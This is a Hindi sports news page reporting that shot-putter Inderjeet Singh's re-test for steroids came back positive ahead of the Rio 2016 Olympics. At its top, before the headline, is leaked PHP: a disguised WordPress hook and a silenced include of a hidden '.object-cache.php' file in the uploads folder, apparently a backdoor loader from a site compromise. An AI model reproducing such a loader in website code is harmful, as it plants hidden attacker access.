add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रियो ओलिंपिक 2016: इंद्रजीत का दूसरा डोप टैस्ट भी आया पॉजिटिव – SOCH INDIA
Menu

खेल
रियो ओलिंपिक 2016: इंद्रजीत का दूसरा डोप टैस्ट भी आया पॉजिटिव

nobanner

रियो ओलिंपिक 2016: इंद्रजीत का दूसरा डोप टैस्ट भी आया पॉजिटिव

रियो डि जेनेरियो में 5 अगस्त से शुरू होने वाले ओलिंपिक से पहले ही भारत डोप के डंक से बेहाल हो गया है। गोला फेंक एथलीट इंद्रजीत सिंह री’ सैंपल भी पॉजिटीव आ गया है। री सैंपल भी पॉजिटीव आने के बाद अब इंद्रजीत सिंह का रियो टिकट कटने का खतरा मंडराने लगा है। गौरतलब है कि एथलीट इंद्रजीत सिंह डोप टैस्ट में फेल हो गए थे। राष्ट्रीय डोपिंग रोधक एजेंसी (नाडा) ने 24 जून को इंद्रजीत का टैस्ट लिया था। उनके सैंपल में स्टेरॉयड मिला था।

28 वर्षीय शॉटपुट खिलाड़ी इंद्रजीत सिंह ने पिछले साल मैंगलोर में हुए फेडरेशन कप में अपना बेहतरीन प्रदर्शन करते हुए 20.65 मीटर गोला फेंककर वल्र्ड चैंपियनशिप और रियो ओलंपिक का टिकट हासिल किया था। इंचियोन एशियन खेल-2014 में कांस्य पदक जीतने वाले खिलाड़ी इंद्रजीत ऐसे पहले भारतीय ‘ट्रैक एंड फील्ड’ एथलीट हैं, जिन्होंने रियो ओलंपिक-2016 के लिए क्वालीफाई किया।